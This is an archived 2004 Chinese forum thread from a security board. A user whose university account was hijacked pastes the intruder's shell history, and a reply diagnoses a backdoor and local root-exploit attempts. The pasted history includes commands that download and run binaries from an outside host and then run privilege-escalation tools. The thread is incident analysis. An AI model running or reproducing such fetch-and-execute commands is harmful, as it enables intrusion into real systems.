高手救命：近日帐号被黑！ - 未名空间MITBBS历史存档

国际科技财经博客移民网络热点娱乐民生时事公众号

Redian新闻

>未名空间

>Security - 系统安全

高手救命：近日帐号被黑！

高手救命：近日帐号被黑！# Security - 系统安全

y*j2004-08-29 07:08

1 楼

我在学校里面，收发 Email 都喜欢 ssh 到系
服务器上后用 pine。今日忽然发现有人用我的
用户名和密码登陆：黑客太牛了，居然知道我的
密码。而且，他从我的 .ssh 目录下知道我还
ssh 过其他地方，于是他一个一个登陆过去，
都知道用户名和密码！都不知道他是怎么弄的。
幸好他好象也没有干一些坏事情，例如删除文件
发 Email 之类的。下面是我的 .history
各位高手看看怎么回事，怎么解决。
cd .ssh
cat known_hosts
uname -a
w
wget another00.home.ro/ups
chmod +x ups
./ups
wget another00.home.ro/local1.tgz
cd local
tar -xzvf local1.tgz
cd local
./mem
id
./t
./prt
./su
ls
./brk
另一个服务器上的：
#+1093705127
uname -a
#+1093705131
cd .ssh
#+1093705144
cat /etc/hosts
#+1093705173
wget www.ge

z*y2004-08-29 07:08

2 楼

From your post, it can't tell whether the hacker escalate to root succesfully.
The hacker might have sniffed your usr/passwd. Backdoor was downloaded and
installed, multiple local exploits were attempted to gain root privilege. All
the hosts running samba in your network that are vulnerable probably were
hacked already.
A thorough recovery would be reinstallation.

【在 y*j 的大作中提到】

: 我在学校里面，收发 Email 都喜欢 ssh 到系
: 服务器上后用 pine。今日忽然发现有人用我的
: 用户名和密码登陆：黑客太牛了，居然知道我的
: 密码。而且，他从我的 .ssh 目录下知道我还
: ssh 过其他地方，于是他一个一个登陆过去，
: 都知道用户名和密码！都不知道他是怎么弄的。
: 幸好他好象也没有干一些坏事情，例如删除文件
: 发 Email 之类的。下面是我的 .history
: 各位高手看看怎么回事，怎么解决。
: cd .ssh